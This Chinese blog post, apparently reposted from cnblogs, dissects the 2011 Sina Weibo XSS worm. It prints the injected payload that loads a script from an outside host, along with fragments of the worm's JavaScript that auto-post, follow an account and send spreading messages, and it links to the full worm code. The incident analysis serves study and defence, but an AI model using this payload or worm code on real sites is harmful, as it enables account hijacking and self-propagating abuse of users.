XSS-从weibo蠕虫事件学习

简介:

XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

 

Xss的例子(以新浪微博的6.9的hellosamy蠕虫事件为例):

 

sina的名人堂页面页面上存在这么个链接

<a href="http://weibo.com/pub/star/g/123">这个是xss</a>

 

其实在服务器端是这么写的(猜测,真实代码长啥样不知道,但是一定是忘记做转义就输出了):

Echo '<a href="http://weibo.com/pub/star/g/{$uname}">这个是xss</a>'

 

其中uname并没有做htmlspecialchars。相当于是直接由用户输入,然后输出在页面上了。

这样的html就是存在xss漏洞

 

好了,这个漏洞被发现了,下面要利用它做什么呢?

1 将uname设置成xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

这样这个url就变成了

clip_image001

其中的引号被封闭了,然后这个页面自动运行了一段js脚本

 

这个js脚本做了这样的事情:

1 发送一个微博(这个是之所以成为蠕虫的原因,这个微博中附带着同样的一个连接)

2 加关注uid为2201270010

3 发私信,向好友传播链接

 

js的下载代码在http://www.stwind.org/wp-content/uploads/2011/06/06.28_sina_XSS.txt.zip

 

1
2
3
4
5
6
7
8
9
10
11
try {
 
x= "g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)" ;window.opener.eval(x);
 
}
 
catch (e){}
 
main();
 
var  t=setTimeout( 'location="http://weibo.com/pub/topic";' ,5000);

 

其中就是在打开的页面加入了<script节点>,并执行

main中是发送微博,加关注,发私信三个动作

当5000秒后,当前页重新定位到public/topic上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
function main(){
 
try {
 
publish();
 
}
 
catch (e){}
 
try {
 
follow();
 
}
 
catch (e){}
 
try {
 
message();
 
}
 
catch (e){}
 
}
比如

 

1
2
3
4
5
6
7
8
9
function publish(){
 
url = 'http://weibo.com/mblog/publish.php?rnd='  + new  Date().getTime();
 
data = 'content='  + random_msg() + '&pic=&styleid=2&retcode=' ;
 
post(url,data, true );
 
}

模拟post请求,由于这个js是在weibo网页上调用的,所以就没有跨域问题

 

直接post就可以产生这个效果

 

注:这次事件中还用到了短链接服务

短链接服务能自定义用户链接,比如http://weibo.com/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

这么长一个链接能变为http://t.cn/atmcqn

这样能增加用户的点击成功率

 

事实证明,建站是需要非常小心的,每个页面,每个输出,如果有一两个漏洞,都可能造成全站的大灾难!!引以为戒!

 

本文转自轩脉刃博客园博客,原文链接:http://www.cnblogs.com/yjf512/archive/2012/03/08/2385093.html,如需转载请自行联系原作者


相关文章
|
安全 网络安全 内存技术
网络安全——xss漏洞之最全事件函数汇总
还在为xss漏洞找不到而发愁?看看这篇最全xss攻击函数汇总在说
369 0
网络安全——xss漏洞之最全事件函数汇总
|
24天前
|
JavaScript 安全 前端开发
js开发:请解释什么是XSS攻击和CSRF攻击,并说明如何防范这些攻击。
XSS和CSRF是两种常见的Web安全威胁。XSS攻击通过注入恶意脚本盗取用户信息或控制账户,防范措施包括输入验证、内容编码、HTTPOnly Cookie和CSP。CSRF攻击则诱使用户执行未经授权操作,防范手段有CSRF Tokens、双重验证、Referer检查和SameSite Cookie属性。开发者应采取这些防御措施并定期进行安全审计以增强应用安全性。
18 0
|
3月前
|
存储 JSON 前端开发
【面试题】XSS攻击是什么?
【面试题】XSS攻击是什么?
|
3月前
|
存储 开发框架 安全
如何处理预防XSS漏洞攻击问题
防止XSS攻击需要从多个方面入手,包括输入验证和过滤、输出编码、设置正确的HTTP头部、使用最新的安全框架和库、定期进行安全审计和漏洞扫描以及培训和意识提升等。只有综合运用这些措施,才能有效地防止XSS攻击,保护网站和用户的安全。
|
6月前
|
存储 安全 JavaScript
渗透攻击实例-xss跨站脚本攻击
渗透攻击实例-xss跨站脚本攻击
|
1天前
|
安全 JavaScript Go
跨站脚本攻击(XSS)防护在Django中的应用
【4月更文挑战第15天】本文介绍了Django如何防范XSS攻击。Django模板引擎自动转义HTML以防止恶意脚本,提供`mark_safe`函数和CSRF防护。此外,建议开发者验证清理用户输入、使用内容安全策略、更新库以及遵循安全编码实践来增强防护。通过这些措施,开发者能构建更安全的Web应用。
|
1月前
|
安全 JavaScript 前端开发
Low 级别反射型 XSS 演示(附链接)
Low 级别反射型 XSS 演示(附链接)
16 0
|
1月前
|
存储 JavaScript 前端开发
DOM 型 XSS 演示(附链接)
DOM 型 XSS 演示(附链接)
56 0
|
1月前
|
存储 前端开发 JavaScript
存储型 XSS 攻击演示(附链接)
存储型 XSS 攻击演示(附链接)
53 0